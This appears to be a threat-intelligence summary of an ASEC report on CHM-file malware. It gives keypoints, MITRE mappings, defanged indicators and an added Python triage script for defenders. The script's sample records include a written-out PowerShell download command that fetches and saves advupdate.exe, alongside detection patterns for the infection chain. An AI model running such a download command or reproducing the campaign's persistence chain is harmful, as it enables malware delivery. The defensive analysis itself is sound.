APT Attack Being Distributed as Windows Help File (*.chm) – ASEC BLOG

ASEC uncovered malware distributed as Windows Help Files (.chm) aimed at Korean users, delivered via compressed email attachments. When opened, the CHM dropper spawns VBScript and PowerShell payloads, persists through a Run key, and downloads a second-stage downloader from remote URLs. #CHM #MAGE #AhnLab #EncorPost

Keypoints

  • The campaign distributes malware disguised as a Windows Help File (*.chm) targeted at Korean users via compressed email attachments.
  • CHM files inside ZIP/RAR archives trigger further actions, including creation of Document.dat and Document.vbs in the user links folder.
  • Document.dat contains Base64-encoded data that is decoded into Document.vbs, which then initiates persistence and payload execution.
  • Document.vbs uses PowerShell to download an additional file (advupdate.exe) from remote URLs and execute it.
  • The malware persists by adding a Run key entry at HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Document to ensure re-launch.
  • Multiple CHM samples and download URLs are observed, with several domain names and hashed indicators associated with the campaign.
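The keypoints above describe a short infection chain with artifacts at each step (dropped files in the Links folder, a Run value, a second stage in %tmp%, download domains). The following triage script is an added example, not ASEC's or AhnLab's code: it matches exported host and proxy records against the indicators named on this page. The record format (a `(kind, value)` tuple per line) and the sample records are constructed for this example; in practice the input would come from a registry export, a file listing and proxy or DNS logs.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Indicators taken from the ASEC summary (registry value, file names, domains, hashes).
RUN_VALUE = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Document"
DROPPED = {"document.dat", "document.vbs"}      # written to the user's Links folder
PAYLOAD = "advupdate.exe"                        # second stage saved under %tmp%
CHM_NAMES = {"asset.chm", "contract.chm"}        # lure file names listed on the page
DOMAINS = {"encorpost.com", "nhn-games.com", "sktelecom.help", "want-helper.com"}
HASHES = {"3ae6503e836b295955a828a76ce2efa7", "d26481e376134dc14966ccab39b91f16"}
POWERSHELL_RE = re.compile(r"\bpowershell(\.exe)?\b", re.I)


def refang(s: str) -> str:
    """Turn defanged indicators (hxxps://x[.]com) back into matchable form."""
    return s.replace("hxxp", "http").replace("[.]", ".")


def classify(kind: str, value: str):
    """Return (label, reason) when a record matches a campaign indicator, else None.

    kind is one of: registry, file, process, url, hash (constructed record kinds)."""
    low = value.strip().lower()
    if kind == "registry":
        if low == RUN_VALUE.lower():
            return ("run-key", f"autostart value {RUN_VALUE} present")
    elif kind == "file":
        name = low.rsplit("\\", 1)[-1]
        if name in DROPPED and "\\links\\" in low:
            return ("dropper-artifact", f"{name} created in the user's Links folder")
        if name == PAYLOAD and ("\\temp\\" in low or "\\tmp\\" in low):
            return ("second-stage", f"{PAYLOAD} saved in the temp folder")
        if name in CHM_NAMES:
            return ("chm-lure", f"known CHM lure file name {name}")
    elif kind == "process":
        # Document.vbs launches PowerShell to fetch advupdate.exe, so flag a PowerShell
        # command line that references the payload name.
        if POWERSHELL_RE.search(low) and PAYLOAD in low:
            return ("powershell-download", "PowerShell command line references advupdate.exe")
    elif kind == "url":
        host = urlparse(refang(low)).hostname or ""
        if host in DOMAINS or any(host.endswith("." + d) for d in DOMAINS):
            return ("download-domain", f"request to campaign domain {host}")
    elif kind == "hash":
        if low in HASHES:
            return ("sample-hash", f"known CHM sample hash {low}")
    return None


def triage(records):
    """Group matching records by label; a host hitting several labels is a strong signal."""
    hits = defaultdict(list)
    for kind, value in records:
        result = classify(kind, value)
        if result:
            hits[result[0]].append((value, result[1]))
    return dict(hits)


# Constructed sample records (not real telemetry) covering the chain in the keypoints.
SAMPLE_RECORDS = [
    ("file", r"C:\Users\alice\Links\Document.dat"),
    ("file", r"C:\Users\alice\Links\Document.vbs"),
    ("registry", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Document"),
    ("process", r"powershell.exe -c (New-Object Net.WebClient).DownloadFile('<download-url>',"
                r" 'C:\Users\alice\AppData\Local\Temp\advupdate.exe')"),
    ("file", r"C:\Users\alice\AppData\Local\Temp\advupdate.exe"),
    ("url", "hxxps://encorpost[.]com/post/post.php?type=1"),
    ("hash", "3ae6503e836b295955a828a76ce2efa7"),
    ("file", r"C:\Users\alice\Downloads\contract.chm"),
    ("file", r"C:\Program Files\SomeApp\help.chm"),   # benign help file: no match
    ("url", "https://example.com/index.html"),        # benign request: no match
]

if __name__ == "__main__":
    for label, entries in sorted(triage(SAMPLE_RECORDS).items()):
        for value, reason in entries:
            print(f"{label:20} {reason}")
```

The Run value and the Links-folder file names are the cheapest checks to run at scale; the domain and hash lists age quickly, so treat the behavioural labels (run-key, dropper-artifact, powershell-download) as the durable part of the rule set.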

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – The malware is distributed via an email attachment disguised as a Windows Help File (*.chm). "The ASEC analysis team has recently discovered the distribution of malware disguised as a Windows Help File (*.chm)"
  • [T1036] Masquerading – The CHM file is disguised as an innocuous help file. "The CHM file is also disguised as an innocuous help file."
  • [T1059.005] VBScript – Document.vbs contains code that uses PowerShell to download an additional file. "Document.vbs contains a code that uses powershell to download an additional file as shown below."
  • [T1059.001] PowerShell – The downloaded file is saved into the %tmp% folder as advupdate.exe and executed. "The downloaded file is saved into the %tmp% folder as advupdate.exe and is executed."
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – It adds an entry at HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Document so that the VBS file is run again on every logon. "it adds to the path HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Document so that the VBS file can be continuously run."
  • [T1132.001] Data Encoding – Document.dat contains Base64-encoded data, and the decoded data is saved into Document.vbs. "Document.dat contains Base64-encoded data, and the decoded data is saved into Document.vbs."

Indicators of Compromise

  • [File Hash] – 3ae6503e836b295955a828a76ce2efa7, d26481e376134dc14966ccab39b91f16, and 4 more hashes
  • [URL] – hxxps://encorpost[.]com/post/post.php?type=1, hxxps://nhn-games[.]com/game03953/gamelist.php?type=1, and 2 more URLs
  • [Domain] – encorpost[.]com, nhn-games[.]com, sktelecom[.]help, want-helper[.]com, and 2 more domains
  • [File Name] – asset.chm, contract.chm, and 2 more CHM files
  • [File] – advupdate.exe, Document.vbs
  • [Registry Key] – HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Document

Read more: https://asec.ahnlab.com/en/32800/